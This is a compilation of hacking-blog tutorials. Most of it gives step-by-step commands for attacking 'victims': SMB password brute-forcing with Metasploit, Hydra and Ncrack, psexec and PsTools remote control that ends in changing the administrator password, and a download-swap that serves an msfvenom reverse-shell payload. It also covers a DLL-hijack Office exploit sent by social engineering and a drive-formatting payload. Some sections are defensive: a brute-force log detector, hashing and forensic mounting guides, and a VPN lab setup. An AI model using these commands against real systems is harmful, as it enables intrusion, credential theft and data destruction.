Channel: Hacking Articles|Raj Chandel's Blog

4 Ways to Hack SMB Login Password

Previously we have learned all about the SMB port and how to identify whether it is running on a remote host. To read that, click here.
In this article, we will learn how to gain control over the victim's PC through the SMB port. There are various ways to do it, and we will take the time to learn all of them, because different circumstances call for different measures.
SMB Login Check Scanner

This module will test an SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access.

Once Metasploit opens, type:
use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set user_file /root/Desktop/user.txt
msf auxiliary(smb_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(smb_login) > set rhosts 192.168.0.104
msf auxiliary(smb_login) > set rport 445
msf auxiliary(smb_login) > exploit

Here,
auxiliary/scanner/smb/smb_login --> the module we will use to attempt the login
/root/Desktop/user.txt --> the path of the text file that holds all the possible usernames
/root/Desktop/pass.txt --> the path of the text file that holds all the possible passwords


Once the commands are executed, as you can see in the above image, the module starts the dictionary attack, and you will have the right username and password in no time.
xHydra
This is the graphical way to run a dictionary attack against the SMB port. For this method to work:
Open xHydra in Kali. Select the Single Target option and enter the IP of the victim PC there. Then select smb in the box next to the Protocol option and enter the port number 445 next to the Port option.


Now go to the Passwords tab, select Username List and enter the path of the text file containing the usernames in the box next to it.
Then select Password List and enter the path of the text file containing all the passwords in the box next to it.


After doing this, go to the Start tab and click the Start button on the left.


Now the dictionary attack starts, and you will obtain the username and password of the victim.

Hydra
This is a one-command method that works efficiently with little effort. It runs in the Kali terminal, so open the terminal and type:
hydra -l raj -P /root/Desktop/pass.txt 192.168.0.104 smb
Here,
-l --> denotes a single username (here raj)
-P --> denotes the path of the password file
/root/Desktop/pass.txt --> path of the password file



And so, with just one command, we have the username and password of the victim.
Ncrack
This too is a one-command method that works in the Kali terminal. Go to your terminal and type:
ncrack -user raj -P /root/Desktop/pass.txt 192.168.0.104:445
Here,
-user --> denotes the username
raj --> is the username
-P --> denotes the path of the password file
/root/Desktop/pass.txt --> is the path of the password file
445 --> is the port number


And so, with little work, we can obtain the username and password of the victim's PC. These are all the methods to attack a system through the SMB port, which is used for file sharing.
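Every method above produces a burst of failed network logons (Windows Security event 4625, logon type 3) from one source, followed by a success (event 4624) once the right password is found. The following detector is an added example, not part of the original article: it runs over a constructed CSV flattening of those events (timestamp, EventID, IpAddress, TargetUserName, LogonType) and raises an alert when one source exceeds a failure threshold inside a sliding window, and a second alert when that same source then logs on successfully.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of Security log entries flattened to CSV for this example:
# time, EventID (4625 = failed logon, 4624 = successful logon), IpAddress,
# TargetUserName, LogonType (3 = network, which is what SMB logons use).
# 192.168.0.110 plays the host running a wordlist; 192.168.0.50 is a user mistyping.
SAMPLE_LOG = """\
2017-03-01T10:00:00,4625,192.168.0.50,alice,3
2017-03-01T10:00:05,4625,192.168.0.110,raj,3
2017-03-01T10:00:06,4625,192.168.0.110,raj,3
2017-03-01T10:00:07,4625,192.168.0.110,administrator,3
2017-03-01T10:00:08,4625,192.168.0.110,administrator,3
2017-03-01T10:00:09,4625,192.168.0.110,raj,2
2017-03-01T10:00:10,4625,192.168.0.110,guest,3
2017-03-01T10:00:11,4625,192.168.0.110,raj,3
2017-03-01T10:00:12,4625,192.168.0.110,raj,3
2017-03-01T10:00:13,4624,192.168.0.110,raj,3
2017-03-01T10:09:00,4625,192.168.0.50,alice,3
2017-03-01T10:09:20,4624,192.168.0.50,alice,3
"""


def parse_event(line):
    """Split one CSV line into a typed event record."""
    ts, event_id, ip, user, logon_type = line.strip().split(",")
    return {
        "ts": datetime.fromisoformat(ts),
        "event_id": int(event_id),
        "ip": ip,
        "user": user,
        "logon_type": int(logon_type),
    }


def _expire(window, now, max_age):
    """Drop failures older than the sliding window from the left of the deque."""
    while window and now - window[0][0] > max_age:
        window.popleft()


def detect_smb_bruteforce(lines, window_seconds=60, threshold=5):
    """Return alerts for sources that fail many network logons quickly, and for a
    success that follows such a streak (the attacker found a working password)."""
    max_age = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)   # source IP -> deque of (timestamp, username)
    already_flagged = set()         # one brute-force alert per source, not one per attempt
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev["logon_type"] != 3:   # console/RDP logons are not SMB traffic; ignore them here
            continue
        window = failures[ev["ip"]]
        _expire(window, ev["ts"], max_age)
        if ev["event_id"] == 4625:
            window.append((ev["ts"], ev["user"]))
            if len(window) >= threshold and ev["ip"] not in already_flagged:
                already_flagged.add(ev["ip"])
                alerts.append({
                    "type": "smb_bruteforce",
                    "source": ev["ip"],
                    "at": ev["ts"].isoformat(),
                    "failures": len(window),
                    "usernames": sorted({user for _, user in window}),
                })
        elif ev["event_id"] == 4624 and len(window) >= threshold:
            alerts.append({
                "type": "success_after_bruteforce",
                "source": ev["ip"],
                "user": ev["user"],
                "at": ev["ts"].isoformat(),
                "failures": len(window),
            })
            window.clear()          # the streak is over; start counting afresh
    return alerts


if __name__ == "__main__":
    for alert in detect_smb_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

The two legitimate failures from 192.168.0.50 are nine minutes apart and never reach the threshold, while the wordlist host trips both alerts; the distinct-username list in the first alert is what separates a user list from one person retyping a password.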

4 ways to Connect Remote PC using SMB Port

To understand what the SMB protocol is, click here.
To learn how to collect usernames and passwords for your remote host via the SMB protocol, click here.
In this article, we will learn how to exploit the remote PC once you have collected a username and password for the victim's PC. There are four ways to do so, and they are all listed below:
Microsoft Windows Authenticated User Code Execution

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.0.104
msf exploit(psexec) > set rport 445
msf exploit(psexec) > set smbuser administrator
msf exploit(psexec) > set smbpass Ignite@123
msf exploit(psexec) > exploit

Here,
rhost --> IP of the victim PC
rport --> port through which we are attacking
smbuser --> username
smbpass --> password


Once the commands run, you will gain a meterpreter session on the victim's PC and can access it as you want.

Microsoft Windows Authenticated Powershell Command Execution

This module uses a valid administrator username and password to execute a powershell payload using a similar technique to the "psexec" utility provided by SysInternals. The payload is encoded in base64 and executed from the command line using the -EncodedCommand flag. Using this method, the payload is never written to disk, and given that each payload is unique, it is less prone to signature-based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a powershell invocation which hides the window entirely.

msf > use exploit/windows/smb/psexec_psh
msf exploit(psexec_psh) > set rhost 192.168.0.104
msf exploit(psexec_psh) > set rport 445
msf exploit(psexec_psh) > set smbuser administrator
msf exploit(psexec_psh) > set smbpass Ignite@123
msf exploit(psexec_psh) > exploit


Once again, as the commands run you will gain a meterpreter session on the victim's PC, and you can do as you desire.

Atelier Web Remote Commander
This is graphical software that lets us gain control of the victim's PC quite easily.
Once you have opened the software, enter the IP address of the victim's PC in the Remote host box, along with the username and password in their respective boxes. Then click Connect; the victim's whole screen will appear on your desktop and you will have a good view of what the victim is doing.


Psexec.exe
Psexec.exe is software that helps us access other computers on a network. It takes us directly to the shell of the remote PC, with the advantage of doing nothing manually. Download it from --> http://download.sysinternals.com/files/PSTools.zip.
Unzip the file once you have downloaded it. Go to your command prompt and type:
psexec.exe \\192.168.0.106 -u administrator -p Ignite@123 cmd
Here,
192.168.0.106 --> is the IP of the remote host
-u --> denotes the username
-p --> denotes the password
cmd --> opens the victim's command prompt

3 Ways to Mount a RAW Image in Windows

In forensics, to investigate a hard drive or disk we always make a forensic image. A forensic image is a forensically sound and complete copy of a hard drive or other digital media, generally intended for use as evidence. Copies include unallocated space, slack space, and the boot record. Many computer forensic programs, especially the all-in-one suites, use their own file formats to store information. These images are stored as RAW, AFF or E01 files.

RAW Image Format: This format is a raw bit-by-bit copy of the original. It is often accompanied by metadata stored in separate files. This image format is the most commonly used and is read by every forensic tool in the industry.

Once the RAW image is created, it can't be read unless it is mounted by a tool. Mounting is the process that takes the raw logical image and attaches it to a directory of your choice so that the contents of the image can be examined. The image has to contain a recognizable file system as a partition. This makes invocation of the command interesting, as the raw image is a physical disk image and not a specific partition of a file system.

Mounting an image for a read-only view lets us see the content of the image exactly as the user saw it on the original drive.


There are various methods to mount a RAW file. But before we learn how to mount our RAW files, have a look at My Computer so that you know how many drives you have before mounting a RAW file. For instance, the following is the My Computer view of my PC:


Now, let us have a look at these methods:

Forensic Tool Kit Imager

FTK Imager (version 3.4.2) is a tool introduced by AccessData which is used to preview data. It is also an imaging tool that lets us acquire images in a forensically sound way. FTK helps us create forensic images, mount an image for a read-only view, create hashes of files, etc., and right now we will focus on its Mount function. To mount a RAW image file via FTK, first download FTK from --> http://accessdata.com/product-download/digital-forensics/ftk-imager-version-3.4.2
Now that FTK is downloaded and installed, open it and click File on the menu bar. A drop-down menu will appear; from this menu click Image Mounting.



A dialogue box will open now. Enter the path of the RAW file in the Image File option and click the Mount button.


Once you click the Mount button, your image will be mounted and you can see the result under Mapped Images:


OSFMount
OSFMount (version 1.5.1015) is software by PassMark Software. It helps you mount your image files, even a hard disk image file, in Windows with a drive letter. You can then analyze the disk image files further. So that your original files are not altered, the image files are mounted as read-only by default. Download this software from --> http://www.osforensics.com/tools/mount-disk-images.html

Open OSFMount after the installation is completed:


Go to File menu and select Mount new virtual disk option.


A dialogue will open; here enter the path of your image file under the heading Image file and click OK.


You can see in the following image that your RAW image is mounted as a result:


Mount Image Pro
GetData is a software development company that has launched Mount Image Pro (version 6). It is a computer forensic tool which enables us to mount an image for forensic purposes. You can download this software from http://www.mountimage.com/
Open the software after its installation.


Go to the File menu and click Mount Image File.


A dialogue box will open; select your image file from it.


Then another dialogue box will open showing you all the details. Click OK.


It will further show you the progress in another dialogue box.


As the outcome, you can see that your image file is mounted as shown in the following image:



Now, as I had asked you to check My Computer before mounting the image, you can check My Computer again and you will see an extra drive as shown below:

A New Way to Hack Remote PC using Xerosploit and Metasploit

In this article we will learn how to replace a file the victim is downloading with your Metasploit payload. That means if the victim is about to download an .exe file, you can swap it with your payload (.exe), compromising the victim without his/her knowledge.
We will achieve this with the help of Xerosploit. To learn all about Xerosploit click here, but first we will make the payload using msfvenom.
Now make your msfvenom payload. Here, we have made a payload named putty, as we have taken putty as the example for our practical:


msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.121 lport=8443 -f exe > /root/Desktop/putty.exe


Once your payload is created and saved on your desktop, open a terminal in Kali and type xerosploit to run it.


Once Xerosploit starts, type the help command; it will show you all the basic commands. Then type scan and press Enter so that you can see all the IP addresses in your network.


Choose your target and type its IP so that it is now targeted. Then type help again to see all the commands you can now use.


Now type rdownload, as it is what will help us achieve our goal. After you type rdownload, it will ask you to type run, so type run next.

In the next step it will ask you for the extension of the files you want to replace. For example, we have taken the .exe extension because we want to replace all the exe files the victim downloads.

Then it will ask you for the path of the file which will replace the victim's file. For instance, our payload's name was putty.exe and it was saved on the Desktop, so we gave the path: /root/Desktop/putty.exe

After giving the path, simply press Enter.


Now you can see that the victim is trying to download putty, but our payload will be downloaded instead. Thus, the victim is compromised.



Now that the download of putty has started, the browser asks the victim to save the downloaded file (which, to the victim, is the putty he/she wanted to download), so he/she will naturally save the file.


Now that the victim's part is done, we will open Metasploit in our terminal and use the multi/handler exploit to obtain the session.

Therefore, open Metasploit by typing msfconsole in your Kali terminal and type:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.121
set lport 8443
exploit


Once all the commands of multi/handler are executed, it will give you the session of your victim, as shown above.
Hence, the victim is compromised in one of the genuine ways.

Control Remote PC using PSTools

The PsTools kit is a collection of 13 tools developed by Mark Russinovich. These are command-line tools that let you execute processes on remote systems and redirect console applications' output to the local system, so that these applications appear to be running locally. All of them are compatible with Windows NT or later. Being console applications, these tools work on both the local computer and a remote host. They require no manual installation of software on the remote system, and they let you specify alternative credentials to access the remote system. The "Ps" prefix in PsList relates to the fact that the standard UNIX process-listing command-line tool is named "ps", so this prefix has been adopted for all the tools in order to tie them together into a suite named PsTools.


Listed below are all tools in the said tool kit:
·         PsExec - execute processes remotely
·         PsFile - shows files opened remotely
·         PsGetSid - display the SID of a computer or a user
·         PsInfo - list information about a system
·         PsPing - measure network performance
·         PsKill - kill processes by name or process ID
·         PsList - list detailed information about processes
·         PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
·         PsLogList - dump event log records
·         PsPasswd - changes account passwords
·         PsService - view and control services
·         PsShutdown - shuts down and optionally reboots a computer
·         PsSuspend - suspends processes

Let us now learn how to use these through the command prompt, one by one.

First, open your command prompt and change into the PsTools directory using the cd command, as shown below:


Once you are in the PsTools directory, run the dir command so that you can see the list of all the tools.
Now we run a command that uses the PsGetSid tool in the kit. The command is:
PsGetsid64.exe \\192.168.1.104 -u administrator -p Ignite@123
Here,
192.168.1.104 --> our victim's IP
-u --> denotes username
Administrator --> username
-p --> denotes password
Ignite@123 --> password


Executing this command tells us the SID of the victim's PC.
Next, we will learn about the psinfo.exe tool, which gives us all the necessary information about the remote PC. To make this tool work, type:
psinfo.exe \\192.168.1.104 -u administrator -p Ignite@123


After this command has run, it will give you the information you can see above.
Moving forward, we will now make the psfile tool work by typing the following command:
psfile64.exe \\192.168.1.104 -u administrator -p Ignite@123


Executing this command lets us see every file and directory that is open remotely on the victim's PC.
Our next tool is pslist; to make it work, type:
pslist64.exe \\192.168.1.104 -u administrator -p Ignite@123


This command lets us see the list of all the processes running on the remote PC, as seen above.
Our next tool is PsService.exe, which tells us about all the services on the victim's PC. The command is:
PsService64.exe \\192.168.1.104 -u administrator -p Ignite@123


You can see the result in the above image.
One of these tools helps us see the event logs of the victim PC. That tool is psloglist.exe, and the command to run it is:
psloglist.exe \\192.168.1.104 -u administrator -p Ignite@123


So our command is successful, as we have our desired result.
Now, pspasswd64.exe is the most important tool, as it lets us change the password of an account on the PC. The command to achieve this is:
pspasswd64.exe \\192.168.1.104 -u administrator -p Ignite@123 administrator forever
Here,
192.168.1.104 --> our victim's IP
-u --> denotes the username
administrator --> username
-p --> denotes the password
Ignite@123 --> password
administrator --> username (given again to specify which user's password we want to change)
forever --> the new password for that user


This successfully changes the password, as shown in the above image.
Another important tool is PsExec64.exe, which takes us directly into the shell of the victim's PC. Its command is:
PsExec64.exe \\192.168.1.104 -u administrator -p forever cmd


Lastly, our next tool helps us shut down the remote PC. For that, just type:
psshutdown.exe \\192.168.1.104 -u administrator -p forever


As shown in the image above, the remote PC will shut down in 20 seconds.
So, these were the tools in the PsTools kit and the commands to run them. These tools make our work a lot easier and come in handy.
PS --> If you come across the following dialogue box, always click AGREE, or else the above commands will not work. The dialogue box is shown below:

How to Detect Meterpreter in Your PC

This anti-Metasploit article is about how you can detect whether someone has compromised you through Metasploit. Most of the time we stumble upon ways in which we can be hacked, or how to hack someone, but no one tells you how to detect whether you have been hacked.
So, in this article we will learn how to detect whether someone has compromised you through Metasploit. For this there are two tools:

·         Antipwny
·         Antimeter
Both of these tools will help us achieve our goal. They let you kill the meterpreter session that the attacker has gained. You can download these tools from --> http://www88.zippyshare.com/v/t6FjCuTR/file.html

Antipwny

When you double-click the software, a dialogue box will open and show the meterpreter process running on your computer, as shown:


Now, right-click the process and select the Kill process option.


And so you can detect the process and stop it too, in just two simple steps.

Antimeter
When you open this software, it scans the whole computer and shows the file containing the malicious process. It also asks whether to kill the process or not. Type y for yes and the process will die.


These are the ways to detect whether you have been hacked. These tools not only allow us to detect the process but also help us kill it, in two simple steps. When the steps are completed, the attacker loses the session, leaving you safe and secure. So go on and raise your head against these exploiting hackers.

Hack Remote Windows PC using Office OLE Multiple DLL Side Loading Vulnerabilities

Multiple DLL side-loading vulnerabilities were found in various COM components. These issues can be exploited by loading these components as an embedded OLE object. When a vulnerable object is instantiated, Windows tries to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory that also contains the attacker's DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system.

Exploit Targets
MS Office 2007
MS Office 2010

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/fileformat/office_ole_multiple_dll_hijack
msf exploit(office_ole_multiple_dll_hijack) > set payload windows/meterpreter/reverse_tcp
msf exploit(office_ole_multiple_dll_hijack) > set lhost 192.168.0.105 (IP of the local host)
msf exploit(office_ole_multiple_dll_hijack) > exploit


After we successfully generate the malicious DLLs and the ppsx file, they are stored on your local computer under:

/root/.msf4/local


COMServices.ppsx is the file that you will zip and send to the victim using the various social engineering techniques we have studied in previous articles.


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.105
exploit

Now send the malicious PPT file to the victim; as soon as they download and open it, you get a meterpreter shell on the victim's computer.

Beginner Guide to Understand Hashing in Cryptography

Cryptography is the conversion of plain, readable text into an unreadable form. In cryptography the data is first converted into ciphertext (that is encryption) and then the ciphertext is converted back into readable form (that is decryption). Cryptography basically works on the concept of encryption and decryption. Encryption and decryption should not be confused with encoding and decoding, in which data is converted from one form to another but is not deliberately altered so as to conceal its content. Encryption is achieved through algorithms. These algorithms work with logic, mathematical calculations and their complexity.
The hash function is one of the most important functions in cryptography. A hash means a 1-to-1 relationship between data. This is a common data type in languages, although sometimes it's called a dictionary. A hash algorithm is a way to take an input and always get the same output, otherwise known as a 1-to-1 function. An ideal hash function is one where this process always yields a unique output. So you can tell someone: here is a file, and here is its md5 hash. If the file has been corrupted in transit, then the md5 hash will be a different value.
In practice, a hash function always produces a value of the same size; for instance, md5() always returns 128 bits no matter the size of the input. This makes a true 1-to-1 relationship impossible. A cryptographic hash function takes extra precautions to make it difficult to produce 2 different inputs with the same output; such a pair is called a collision. It also makes it difficult to reverse the function. Hash functions are used for password storage because if an attacker were to obtain the password's hash, it forces the attacker to break the hash before he can use it to log in. To break hashes, attackers take a word list or an English dictionary, compute all of the corresponding hash values, and then iterate through the list for each password looking for a match.
md5(), sha0 and sha1() are all vulnerable to hash collision attacks and should never be used for anything security related. Instead, any member of the SHA-2 family, such as SHA-256, should be used.
To calculate Hash Value, we will use Hash Calculator. Install Hash Calculator from --> http://www.slavasoft.com/hashcalc/
Hash function plays major role in hacking/forensic world because it helps us to know whether a particular file has changed or not. You can also calculate hash value of your computer and know if anyone has made any kind of changes.

To calculate hash value open Hash Calculator.


Now browse to the file whose hash value you want to calculate and click Calculate.


After clicking Calculate, it will give you hash values using four different hashing algorithms, i.e. MD5, SHA1, RIPEMD160 and CRC32. You can check other boxes too if you want to use those algorithms to calculate the hash value.
This is how Hash Calculator helps us find the hash value. Now if any changes are made to this file, the hash value will change too.
Once I had calculated the hash value above, I made some changes to the file and calculated the hash value again with the same method, and as a result the hash value changed.



Now we have two hash values. Let us compare the MD5 values. The value of the first file is 1110808875326e25dl93e4ee096afaf1 and the value of the other file is fb9d53883f302d78c978a583e8a85.
Seeing these two MD5 values of the same file, we can conclude that some changes were made, because even the slightest difference changes the hash value.
But now the main question is how to locate this change, because a file can be 1 TB in size. Also imagine that you are sending a hard disk full of important documents to someone and there is a real possibility that someone bribes the courier and makes changes to your documents. So how can you detect these changes?
The answer is very simple --> Compare it! This tool helps us achieve our goal, which is to locate the change.
Download Compare it! from --> http://www.grigsoft.com/wincmp3.htm
Open Compare it!



Click File and a drop-down menu will appear. Select the Compare files option.


A dialogue box will open asking you to choose the files you want to compare. Click the Browse button, select your file, and click Open.


It shows you the changes by highlighting them in green, and the red colour marks the exact change, as shown below:


So in this way you can protect your sensitive data and detect tampering too.
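The hash comparison described above and the file diff that Compare it! performs can both be scripted. The following is an added example, not code from the original article: it hashes two constructed documents in fixed-size chunks (so a 1 TB image never has to fit in memory), shows that one changed digit flips every digest while the digest length stays fixed, and then locates the changed lines the way the diff tool highlights them.

```python
import difflib
import hashlib
import os
import tempfile

# Constructed sample documents for this example (not files from the original article).
ORIGINAL = b"Project budget 2017\nQ1: 120000\nQ2: 135000\nApproved by: R. Chandel\n"
TAMPERED = b"Project budget 2017\nQ1: 120000\nQ2: 185000\nApproved by: R. Chandel\n"


def file_digests(path, algorithms=("md5", "sha1", "sha256"), chunk_size=1 << 20):
    """Hash a file in chunks and return {algorithm: hexdigest}.

    Every digest has a fixed length regardless of input size:
    MD5 128 bits (32 hex chars), SHA-1 160 bits (40), SHA-256 256 bits (64).
    """
    hashers = {name: hashlib.new(name) for name in algorithms}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def verify_integrity(path, expected_sha256):
    """True when the file's SHA-256 matches the value recorded before it was sent."""
    return file_digests(path, ("sha256",))["sha256"] == expected_sha256


def changed_lines(original_path, suspect_path):
    """Return the removed ('-') and added ('+') lines, like the diff tool's highlighting."""
    with open(original_path, "rb") as a, open(suspect_path, "rb") as b:
        a_lines = a.read().decode("utf-8", "replace").splitlines()
        b_lines = b.read().decode("utf-8", "replace").splitlines()
    diff = difflib.unified_diff(a_lines, b_lines, "original", "suspect", lineterm="", n=0)
    return [line for line in diff
            if line.startswith(("+", "-")) and not line.startswith(("+++", "---"))]


def demo():
    """Write both constructed documents to a temp dir and run the investigator's checks."""
    workdir = tempfile.mkdtemp()
    original_path = os.path.join(workdir, "budget.txt")
    suspect_path = os.path.join(workdir, "budget_received.txt")
    with open(original_path, "wb") as fh:
        fh.write(ORIGINAL)
    with open(suspect_path, "wb") as fh:
        fh.write(TAMPERED)

    before = file_digests(original_path)
    after = file_digests(suspect_path)
    return {
        "before": before,
        "after": after,
        # A single changed digit alters every digest, not just a few bits of one of them.
        "digests_differ": all(before[algo] != after[algo] for algo in before),
        # Chunked hashing gives the same result as hashing the whole buffer at once.
        "chunked_matches_oneshot": hashlib.sha256(ORIGINAL).hexdigest() == before["sha256"],
        "original_intact": verify_integrity(original_path, before["sha256"]),
        "suspect_intact": verify_integrity(suspect_path, before["sha256"]),
        "changes": changed_lines(original_path, suspect_path),
    }


if __name__ == "__main__":
    result = demo()
    for algo in result["before"]:
        print(f"{algo:7} before = {result['before'][algo]}")
        print(f"{algo:7} after  = {result['after'][algo]}")
    print("received copy intact:", result["suspect_intact"])
    for line in result["changes"]:
        print(line)
```

Record the SHA-256 (not the MD5, for the collision reason the article gives) before the disk leaves your hands; the diff step only tells you where the change is once the digest has already told you that there is one.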

Fun with Metasploit Payloads

Ordinarily small things seem to have no use, but when their greater relevance comes up, at a certain point in time they have an outsized impact and can create a complex situation. This article is about some simple payloads that let us meddle with our victim and leave a mark behind.
Moreover, Metasploit is not just about hacking; it's also about hacking in style. There are a lot of payloads that are too good not to use. These payloads are like small droplets in an ocean, but they still matter, and only a handful of people know about them. So far we have only learnt about hardcore Metasploit, but let's see what more cool things it has to show us.

Add User
Moving forward, let us learn how to make such payloads. Open Metasploit and use the windows/adduser payload. This payload creates another user on the victim's PC. The commands are:

use windows/adduser
set user raaz
set pass Ignite@123
set wmic true

generate -t exe -f /root/Desktop/user.exe


When the generated file is executed, a new user is created on the victim's PC. You can go to the shell of the victim's PC and see the result; to list the users, type:
net user


Message Box

Another payload is windows/messagebox. This payload makes a pop-up message appear on the victim's PC. The message can be anything you want, along with a title. To create this payload, again open Metasploit and use windows/messagebox. The commands are:
use windows/messagebox
set text you have been hacked
set title Important Message
generate -t exe -f /root/Desktop/message.exe


Your payload is created. When you send it and the victim opens it, a pop-up message box will appear displaying your message, like the following one:


Our next payload is windows/format_all_drives. This payload formats any desired drive. The commands to create this payload are:

use windows/format_all_drives
set volumelabel 3
generate -t exe -f /root/Desktop/format.exe


When the payload is sent and opened, it formats the drive.
Speak
Another such payload is windows/speak_pwned. This is a one-line payload which plays an audio message saying "you have been pwned"; when the victim opens it, the audio is played for him/her. Its commands are:
use windows/speak_pwned
generate -t exe -f /root/Desktop/speak.exe


So that is how you can use different payloads to mess with your victim. You can also create these payloads and keep them safe so that you can use them whenever you want. Please note that all these payloads are post-exploitation payloads; to make them work, you first need to compromise the victim.

This way even the smaller things make a difference; after all, even a pawn can kill the king. And most importantly, once you are done with your victim you can leave him/her a souvenir.

Shodan a Search Engine for Hackers (Beginner Tutorial)

Many people have described Shodan as a search engine for hackers, and have even called it "the world's most dangerous search engine". It was developed by John Matherly in 2009, and unlike other search engines, it looks for specific information that can be invaluable to hackers. John Matherly is an Internet cartographer, hence Shodan.

Shodan is a type of search engine that allows users to search for Internet-connected devices and explicit website information such as the type of software running on a particular system and local anonymous FTP servers. Shodan can be used much in the same way as Google, but indexes information based on banner content, which is meta-data that servers send back to hosting clients. For the best results, Shodan searches should be executed using a series of filters in a string format.

So in conclusion we can say that, Shodan is a search engine for finding specific devices, and device types, that exist online. It is like an internet map that lets us see which device is connected to which or ports are open on a specific device or what operating system a certain system is using, etc. Rather than to locate specific content on a particular search term, SHODAN is designed to help the user find specific nodes (desktops, servers, routers, switches, etc.) with specific content in their banners.

What Shodan can do?
Shodan pulls service banners from servers and devices on the web, mostly port 80, but also ports 21 (ftp), 22 (SSH), 23 (telnet), 161 (SNMP), and 5060 (SIP). Since almost every new device now has a web interface (maybe even your refrigerator) to ease remote management, we can access innumerable web-enabled servers, network devices, home security systems, etc. Shodan can find us webcams, traffic signals, video projectors, routers, home heating systems, and SCADA systems that, for instance, control nuclear power plants and electrical grids. If it has a web interface, Shodan can find it! Although many of these systems communicate over port 80 using HTTP, many use telnet or other protocols over other ports. Keep that in mind when trying to connect to them.

How to use Shodan?

Understanding Shodan is very important. At first you might find it complex, but once you get to know it you will find it very handy and very resourceful too. So, now let us learn how to work with this fascinating search engine. To use Shodan to your advantage, you first have to register.


Follow the steps to register. After registration, a link will be sent to your e-mail address to activate your Shodan account. Once your account is activated, log in to Shodan; now that you are logged in, you are free to search for anything.
Here are some examples of things you can search for with Shodan.
Webcam
When you search for webcam, it shows you all the webcams it has indexed around the world. The results look like the image below:


Traffic Signals
Searching for traffic signals or traffic signal camera shows you all the indexed traffic surveillance cameras.


Cisco
Searching for cisco will show you all the Cisco routers in the world, but you can also search for them by country. Like, here, I have found Cisco routers in India and the result is in the image below :


Scada
You can also search for Scada and you will get its information from around the whole world as shown :


netcam
Shodan can also show you all the netcams in the world and you can access them too with your hacking skills.


GPS
Shodan even lets you find all the GPS devices all over the world; for this you just have to type gps in the search box.


Port
Not only the devices, but it can also help find which port is open on which device. For example, here I have searched port : 1723. Now we all know this port is used for VPN, so through this we can know which devices are using VPN, as shown in the image below :


When you search for port : 3389 it will also show the operating system used by the device, which can be very useful.

This is how Shodan is useful for hackers, as it gives all the information necessary to collect, and that too from all over the world. And so you can use this information as you desire.

Setup VPN Penetration Testing Lab in Server 2008

You just need to follow the basic steps for configuring a remote access virtual private network (VPN) server using Server Manager, the Add Roles Wizard, and the Routing and Remote Access Server Setup Wizard. After you finish configuring a basic remote access VPN server, you can perform additional configuration tasks on client depending on the way you want to use the remote access VPN server.


 Start -> Administrative Tools -> Server Manager. Click Add Roles


This wizard helps you install roles on your server; click on next to continue.


Tick “Network Policy Server” under Role Services and click on next.

Network Policy and Access Services provides Network Policy Server (NPS), Routing and Remote Access (RRAS), Health Registration Authority (HRA), and Host Credential Authorization Protocol (HCAP), which help safeguard the health and security of your network.


Read the requirements and click “Next” to continue.


On the following screen “Select Role Services” for Network Policy and Access Service, place a check mark on Routing and Remote Access Services and make sure “Remote Access Service” and “Routing” are selected as well. Click next to continue.


To install following role services for Network Policy and Access Service click on Install.


This shows the summary: Remote Access Service and Routing were installed successfully. Once the installation finishes, click close to end the wizard.
Up to here I have completed the installation of the VPN role on the server.


To complete the configuration in Routing and Remote Access, follow these steps.
Start -> Administrative Tools ->Routing and Remote Access


In the console that opens, right click your server name and click on “Configure and Enable Routing and Remote Access“; this configures Routing and Remote Access on the selected server.


In the Wizard you can enable any of following combinations of services. I will choose Custom Configuration for my server and click on Next.

Next is the Routing and Remote Access Server Setup Wizard, in which I am going to decide which type of access should be allowed to clients accessing the server network.

You can configure the selected services in the Routing and Remote Access console. I am selecting the check box for VPN access on this server and clicking on next to continue.

Now you have successfully completed the setup of the VPN access service on your server; to close this wizard click on finish.


Now you will get a dialog box with the message that the Routing and Remote Access service is ready to use. So click on Start Service.


Once the process is finished, and you are back on the main Server Manager window, routing and remote access should now be up and running.


Once you have successfully configured Routing and Remote Access, the administrator selects the desired user and grants the privilege to access the server through a VPN connection, so that clients can connect from different locations.

 Start -> Administrative Tools -> Active Directory Users and Computers -> Right Click the properties of an user


Click on the Dial-In tab and under “Network Access Permission” select Allow Access. Click on Apply and OK to finish. Only the selected client will be able to connect to the server network through VPN from a different network.

This was the first phase of the VPN configuration, performed on the server side by the administrator.


SETUP VPN CONNECTION FOR CLIENT ON WINDOWS 7

Setting up a client connection to a VPN network is very similar to setting up an old-fashioned Dial-Up connection through a phone line. You need to enter a server address (hostname or IP), user and password. Once connected, this system will receive an IP address within the VPN network, so you’ll be able to access it from any other machines also connected to the same VPN network.

Click on Start -> Control Panel -> Network and Internet -> Network and Sharing Center
Under Change your network settings, click on the set up a new connection or network option; this contains different types of network connection options like broadband, dial-up, VPN, or set up a router or access point.



Here you can see many other options, as I said; I will choose connect to a workplace to set up a dial-up or VPN connection to your workplace. This option sets up the connection from the client to the workplace, or in our case, to the server.



Now you will see the next wizard for connecting to a workplace, which asks for the type of connection through which you will connect to your workplace or server.
My option will be use my internet connection (VPN), so the connection will be established over the internet.


